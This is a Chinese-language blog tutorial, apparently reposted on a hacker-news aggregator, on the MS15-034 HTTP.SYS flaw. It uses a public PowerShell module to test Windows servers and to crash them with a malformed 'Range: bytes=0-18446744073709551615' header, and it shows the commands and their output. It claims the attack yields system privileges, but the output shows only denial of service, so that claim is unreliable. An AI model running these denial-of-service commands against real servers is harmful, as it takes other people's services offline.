记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

HTTP.SYS远程执行代码漏洞(ms15-034)

2017-02-03 06:10

我们团队针对这个漏洞,有专门做了一个视频。

传送门http://www.0-sec.org/ms15-034(HTTP.SYS远程执行代码漏洞).rar

 

影响版本:Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

poc下载地址:https://github.com/poshsecurity/MS15034

这个脚本有三个参数

1. windows2008

2. windows2012

3. -serverPath

前两个参数代表被攻击的机器,它们会访问http://computer/welcom.png 和 http://computer/iis-85.png. 第三个参数是可选的,你可以用下面的方式使用这个参数:

1. /index.html

2. /companylogo.png

3. images/logo.jpg

让我们来看看具体的例子:

1.测试一台装了windows2008的服务器是否有漏洞。

1
2
3
4
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Test-MS15034 -Computer 192.168.1.3 -Windows2008
This server is vulnerable to MS 15-034
PS C:\tools>

 

2. 测试一台装了windows2012的服务器是否有漏洞.

1
2
3
4
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Test-MS15034 -Computer 192.168.1.2 -Windows2012
This server is vulnerable to MS 15-034
PS C:\tools>

3. 测试显示服务器不存在漏洞

1
2
3
4
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Test-MS15034 -Computer 192.168.1.4 -Windows2012
This server is not vulnerable to MS 15-034
PS C:\tools>

4.使用自定义路径来测试服务器是否有漏洞

1
2
3
4
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Test-MS15034 -Computer 192.168.1.3 -ServerPath "/welcome.png"
This server is vulnerable to MS 15-034
PS C:\tools>

5. 故意使用错误的系统版本来测试服务器是否有漏洞

1
2
3
4
5
6
7
8
9
10
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Test-MS15034 -Computer 192.168.1.3 -Windows2012
Test-MS15034 : The provided path has not been found, check you have selected the right operating system, or specified
a valid file in -ServerPath
At line:1 char:1
Test-MS15034 -Computer 192.168.1.3 -Windows2012
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Test-MS15034
PS C:\tools>

6. 用自定义路径来检测一台服务器是否有漏洞(路径不存在)

1
2
3
4
5
6
7
8
9
10
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Test-MS15034 -Computer 192.168.1.3 -ServerPath "/thisdoesnotexist.png"
Test-MS15034 : The provided path has not been found, check you have selected the right operating system, or specified
a valid file in -ServerPath
At line:1 char:1
Test-MS15034 -Computer 192.168.1.3 -ServerPath "/thisdoesnotexist.png"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Test-MS15034
PS C:\tools>

CMDLet用指定参数来连接URL,并且连接的时候指定http header的范围是 bytes=0-18446744073709551615.如果服务器响应式http 416那么就说明此服务器是受此漏洞影响的.

接下来我们来干一点邪恶的事情,通过这个漏洞直接拿到系统的权限. invoke-ms15034dos这个函数会帮我们实现这个目的.这个函数需要的参数和上面差不多.它们两者的区别在于后者用先测试被攻击的服务器是否是有漏洞的.有漏洞它才会执行攻击.否则它仅仅是执行dos攻击.dos攻击的 http header 需要被指定为: Range: bytes=0-18446744073709551615.

1. 对windwos2012r2服务器执行拒绝服务攻击

1
2
3
4
5
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Invoke-MS15034DOS -Computer 192.168.1.2 -Windows2012
The server is vulnerable, performing Denial Of Service
Looks like the DOS was successful
PS C:\tools>

2. 对windwos2008r2服务器执行拒绝服务攻击

1
2
3
4
5
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Invoke-MS15034DOS -Computer 192.168.1.3 -Windows2008
The server is vulnerable, performing Denial Of Service
Looks like the DOS was successful
PS C:\tools>

3. 下面的测试是来看看 如果你攻击一台打了补丁的服务器会出现的反应.

1
2
3
4
PS C:\tools> Import-Module .\MS15034.psm1
PS C:\tools> Invoke-MS15034DOS -Computer 192.168.1.4 -Windows2012
Test-MS15034 reported the server not as vulnerable, so not performing Denial Of Service
PS C:\tools>
知识来源: www.0-sec.org/2017/02/02/http-sys%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%a3%e7%a0%81%e6%bc%8f%e6%b4%9ems15-034/

阅读:299662 | 评论:0 | 标签:安全文章 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“HTTP.SYS远程执行代码漏洞(ms15-034)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云